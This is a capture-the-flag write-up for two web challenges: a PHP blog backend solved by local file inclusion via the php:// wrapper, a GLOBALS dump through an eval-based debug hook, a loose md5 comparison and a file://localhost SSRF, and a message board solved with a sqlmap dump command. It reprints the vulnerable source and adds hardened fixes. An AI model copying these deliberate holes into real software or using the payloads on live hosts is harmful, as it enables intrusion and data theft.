1. Cosmos's Blog Backend

The challenge page is a login form.

The challenge description only mentions PHP and HTML, so SQL injection can be ruled out first. Capturing the traffic shows two requests, to index.php and login.php, and the "action=" parameter in the URL suggests a file inclusion vulnerability. Reading the source of index.php and login.php through the include with the php:// wrapper gives the following. index.php:

<?php
error_reporting(0);
session_start();

if(isset($_SESSION['username'])) {
  header("Location: admin.php");
  exit();
}

$action = @$_GET['action'];
$filter = "/config|etc|flag/i";

if (isset($_GET['action']) && !empty($_GET['action'])) {
  if(preg_match($filter, $_GET['action'])) {
      echo "Hacker get out!";
      exit();
  }
  include $action;
}
elseif(!isset($_GET['action']) || empty($_GET['action'])) {
  header("Location: ?action=login.php");
  exit();
}

login.php:

<?php
include "config.php";
session_start();

//Only for debug
if (DEBUG_MODE){
  if(isset($_GET['debug'])) {
      $debug = $_GET['debug'];
      if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
          die("args error!");
      }
      eval("var_dump($$debug);");
  }
}

if(isset($_SESSION['username'])) {
  header("Location: admin.php");
  exit();
}
else {
  if (isset($_POST['username']) && isset($_POST['password'])) {
      if ($admin_password == md5($_POST['password']) && $_POST['username'] === $admin_username){
          $_SESSION['username'] = $_POST['username'];
          header("Location: admin.php");
          exit();
      }
      else {
          echo "用户名或密码错误";
      }
  }
}
?>

<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <meta name="description" content="">
  <meta name="author" content="">
  <title>Cosmos的博客后台</title>
  <link href="static/signin.css" rel="stylesheet">
  <link href="static/sticky-footer.css" rel="stylesheet">
  <link href="https://cdn.bootcss.com/bootstrap/3.3.7/css/bootstrap.min.css" rel="stylesheet">
</head>

<body>

<div class="container">
  <form class="form-signin" method="post" action="login.php">
      <h2 class="form-signin-heading">后台登陆</h2>
      <input type="text" name="username" class="form-control" placeholder="用户名" required autofocus>
      <input type="password" name="password" class="form-control" placeholder="密码" required>
      <input class="btn btn-lg btn-primary btn-block" type="submit" value="Submit">
  </form>
</div>
<footer class="footer">
<center>
<div class="container">
      <p class="text-muted">Created by Annevi</p>
    </div>
    </center>
</footer>
</body>
</html>

login.php also references admin.php, so read its source the same way with the wrapper:

<?php
include "config.php";
session_start();
if(!isset($_SESSION['username'])) {
  header('Location: index.php');
  exit();
}

function insert_img() {
  if (isset($_POST['img_url'])) {
      $img_url = @$_POST['img_url'];
      $url_array = parse_url($img_url);
      if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
          return false;
      }  
      $c = curl_init();
      curl_setopt($c, CURLOPT_URL, $img_url);
      curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
      $res = curl_exec($c);
      curl_close($c);
      $avatar = base64_encode($res);

      if(filter_var($img_url, FILTER_VALIDATE_URL)) {
          return $avatar;
      }
  }
  else {
      return base64_encode(file_get_contents("static/logo.png"));
  }
}
?>

<html>
  <head>
      <title>Cosmos'Blog - 后台管理</title>
  </head>
  <body>
      <a href="logout.php">退出登陆</a>
      <div style="text-align: center;">
          <h1>Welcome <?php echo $_SESSION['username'];?> </h1>
      </div>
      <form action="" method="post">
          <fieldset style="width: 30%;height: 20%;float:left">
              <legend>插入图片</legend>
              <p><label>图片url: <input type="text" name="img_url" placeholder=""></label></p>
              <p><button type="submit" name="submit">插入</button></p>
          </fieldset>
      </form>
      <fieldset style="width: 30%;height: 20%;float:left">
              <legend>评论管理</legend>
              <h2>待开发..</h2>
      </fieldset>
      <fieldset style="width: 30%;height: 20%;">
              <legend>文章列表</legend>
              <h2>待开发..</h2>
      </fieldset>
      <fieldset style="height: 50%">
          <div style="text-align: center;">
              <img height='200' width='500' src='data:image/jpeg;base64,<?php echo insert_img() ? insert_img() : base64_encode(file_get_contents("static/error.jpg")); ?>'>
          </div>
      </fieldset>
  </body>
</html>

Reading the source, it is clear that config.php and the flag file cannot be read through the file inclusion (the filter rejects any action containing config, etc or flag). login.php also contains the following:

//Only for debug
if (DEBUG_MODE){
  if(isset($_GET['debug'])) {
      $debug = $_GET['debug'];
      if (!preg_match("/^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$/", $debug)) {
          die("args error!");
      }
      eval("var_dump($$debug);");
  }
}

When debug mode is enabled, PHP's variable variables ($$debug) can be used: setting debug=GLOBALS dumps the values of all currently defined variables.

http://cosmos-admin.hgame.day-day.work/?action=login.php&debug=GLOBALS

Relevant part of the dump:

["admin_password"]=> string(32) "0e114902927253523756713132279690"
["admin_username"]=> string(7) "Cosmos!"
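As an added example, not the challenge's code, here is how the debug block and the credential check in login.php could be hardened: the eval-based debug endpoint is dropped, and the login compares with hash_equals and password_verify instead of a loose == against an md5 hex string. ADMIN_USERNAME and ADMIN_PASSWORD_HASH are assumed names defined in config.php.

```php
<?php
// Added example (not the challenge's code): hardened debug handling and
// credential check for login.php. ADMIN_USERNAME and ADMIN_PASSWORD_HASH are
// assumed to come from config.php, the hash produced once with password_hash()
// instead of storing md5($password).
declare(strict_types=1);

require_once "config.php";
session_start();

// The debug endpoint is removed entirely: eval("var_dump($$debug);") with a
// caller-chosen variable name exposes every variable in scope (GLOBALS),
// including the credentials loaded from config.php. Such tooling belongs
// outside deployed code, not behind a DEBUG_MODE constant.

function check_login(string $username, string $password): bool
{
    // hash_equals() compares byte-for-byte in constant time; a loose == on two
    // numeric-looking strings compares them as numbers rather than as bytes.
    $user_ok = hash_equals(ADMIN_USERNAME, $username);
    // Verify the password even when the username is wrong, so response time
    // does not reveal which half of the check failed.
    $pass_ok = password_verify($password, ADMIN_PASSWORD_HASH);
    return $user_ok && $pass_ok;
}

if (isset($_SESSION['username'])) {
    header("Location: admin.php");
    exit();
}

if (isset($_POST['username'], $_POST['password'])
    && is_string($_POST['username']) && is_string($_POST['password'])) {
    if (check_login($_POST['username'], $_POST['password'])) {
        session_regenerate_id(true); // new session id on login (anti-fixation)
        $_SESSION['username'] = $_POST['username'];
        header("Location: admin.php");
        exit();
    }
    echo "用户名或密码错误";
}
```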

Log in with the credentials obtained.

After logging in there is an "insert image" feature, which looks like the place to start: it inserts an image fetched from a URL, so SSRF is the likely vector. Reading admin.php shows the URL is restricted:

if (@$url_array['host'] !== "localhost" && $url_array['host'] !== "timgsa.baidu.com") {
    return false;
}

The challenge says the flag is in the root directory. Combined with the URL restriction in admin.php, the payload is file://localhost/flag. Opening the developer tools (F12) shows a base64 string in the img tag; decoding it gives the flag.
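As an added example, not the challenge's code, the following is a hardened insert_img() for admin.php that checks the scheme as well as the host and also restricts cURL's own protocol set; the ALLOWED_HOSTS list and the timeouts are assumptions.

```php
<?php
// Added example (not the challenge's code): a hardened insert_img() for admin.php.
// The original only compared parse_url()['host'] against an allowlist and never
// looked at the scheme, so file://localhost/... passed as a "localhost" URL.
// ALLOWED_HOSTS and the timeout values are assumptions.

const ALLOWED_HOSTS = ["timgsa.baidu.com"]; // no "localhost": that is the server itself

function fetch_image(string $img_url): ?string
{
    // Validate the whole URL first, then inspect its parts.
    if (filter_var($img_url, FILTER_VALIDATE_URL) === false) {
        return null;
    }
    $parts = parse_url($img_url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Scheme and host allowlists; exact, case-insensitive matches only.
    if (!in_array(strtolower($parts['scheme']), ["http", "https"], true)
        || !in_array(strtolower($parts['host']), ALLOWED_HOSTS, true)) {
        return null;
    }
    $c = curl_init();
    curl_setopt_array($c, [
        CURLOPT_URL            => $img_url,
        CURLOPT_RETURNTRANSFER => true,
        // Restrict cURL itself too, so a redirect cannot switch protocols.
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_FOLLOWLOCATION => false,
        CURLOPT_CONNECTTIMEOUT => 3,
        CURLOPT_TIMEOUT        => 5,
    ]);
    $res  = curl_exec($c);
    $code = curl_getinfo($c, CURLINFO_RESPONSE_CODE);
    curl_close($c);
    if ($res === false || $code !== 200) {
        return null;
    }
    return base64_encode($res);
}

function insert_img(): string
{
    if (isset($_POST['img_url']) && is_string($_POST['img_url'])) {
        return fetch_image($_POST['img_url'])
            ?? base64_encode(file_get_contents("static/error.jpg"));
    }
    return base64_encode(file_get_contents("static/logo.png"));
}
```

A hostname allowlist still does not stop an allowed name from resolving to an internal address; that needs resolution-time checks, which this example does not include.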

2. Cosmos's Message Board - 1

The challenge description mentions the connection between the database and PHP, so this is clearly SQL injection. A quick test shows that spaces and select are filtered; sqlmap alone is enough to solve it. Manual injection with union select also works, as does boolean-based blind injection. (I used sqlmap directly; union select approach: https://github.com/vidar-team/Hgame2020_writeup/tree/master/week2, boolean blind approach: https://www.jianshu.com/p/647d752b8d34)

sqlmap:

python sqlmap.py -u "http://139.199.182.61/index.php?id=1" -D easysql -T f1aggggggggggggg -C fl4444444g --dump --tamper "randomcase.py,space2comment.py"

I didn't solve the later challenges and only reproduced them from the official writeup, so I won't write them up. Official writeup: https://github.com/vidar-team/Hgame2020_writeup/tree/master/week2
